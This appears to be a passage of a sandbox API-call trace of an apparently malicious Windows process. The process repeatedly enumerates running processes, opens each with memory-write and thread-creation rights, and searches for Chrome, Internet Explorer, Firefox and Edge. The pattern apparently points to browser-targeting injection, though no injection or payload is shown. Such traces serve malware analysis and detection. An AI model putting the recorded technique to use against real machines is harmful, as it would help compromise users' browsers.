	[0225.112] ReadProcessMemory (in: hProcess=0x5c3c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0225.112] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0225.112] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0225.113] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x5c40
	[0225.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.113] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0225.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.113] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.114] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0225.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.114] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.114] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0225.115] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x5c44
	[0225.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.115] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0225.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.115] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.116] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0225.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.116] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.116] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.117] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5c48
	[0225.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.117] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.118] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.118] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.118] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.118] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.119] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5c4c
	[0225.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.120] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.120] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.121] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.121] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.121] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x5c50
	[0225.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.122] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.122] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.123] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.123] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.123] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0225.124] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x5c54
	[0225.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.124] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0225.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.125] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.125] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0225.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.126] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.126] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0225.126] CloseHandle (hObject=0x4fd0) returned 1
	[0225.126] Sleep (dwMilliseconds=0x64) 
	[0225.424] GetCurrentProcessId () returned 0x110
	[0225.424] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0225.429] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0225.430] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0225.431] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0225.432] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5c58
	[0225.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.432] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0225.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.433] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.433] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0225.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.433] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.433] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0225.434] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5c5c
	[0225.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.434] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0225.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.434] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.435] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0225.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.435] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.435] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0225.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5c60
	[0225.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.456] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0225.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.456] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.457] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0225.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.457] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.457] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0225.458] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x5c64
	[0225.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.458] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0225.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.458] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.459] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0225.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.459] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.459] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0225.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5c68
	[0225.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.460] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0225.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.460] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.461] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0225.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.461] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.461] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0225.462] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5c6c
	[0225.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.462] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0225.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.462] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.463] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0225.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.463] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.463] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0225.464] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5c70
	[0225.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.464] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0225.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.464] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.465] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0225.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.465] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.465] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0225.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x5c74
	[0225.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.466] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0225.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.466] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.466] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0225.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.467] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.467] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5c78
	[0225.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.468] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.468] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.469] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.469] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.469] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5c7c
	[0225.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.470] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.470] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.471] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.471] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.471] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5c80
	[0225.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.472] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.472] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.473] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.473] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.473] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x5c84
	[0225.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.474] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.474] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.475] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.475] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.475] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.476] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5c88
	[0225.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.476] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.477] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.477] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.477] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.477] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5c8c
	[0225.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.478] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.479] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.479] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.479] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.479] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.480] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5c90
	[0225.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.480] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.481] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.481] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.481] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0225.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5c94
	[0225.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.482] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0225.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.483] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.520] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0225.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.520] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.521] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.521] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5c98
	[0225.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.522] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.522] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.522] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.523] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
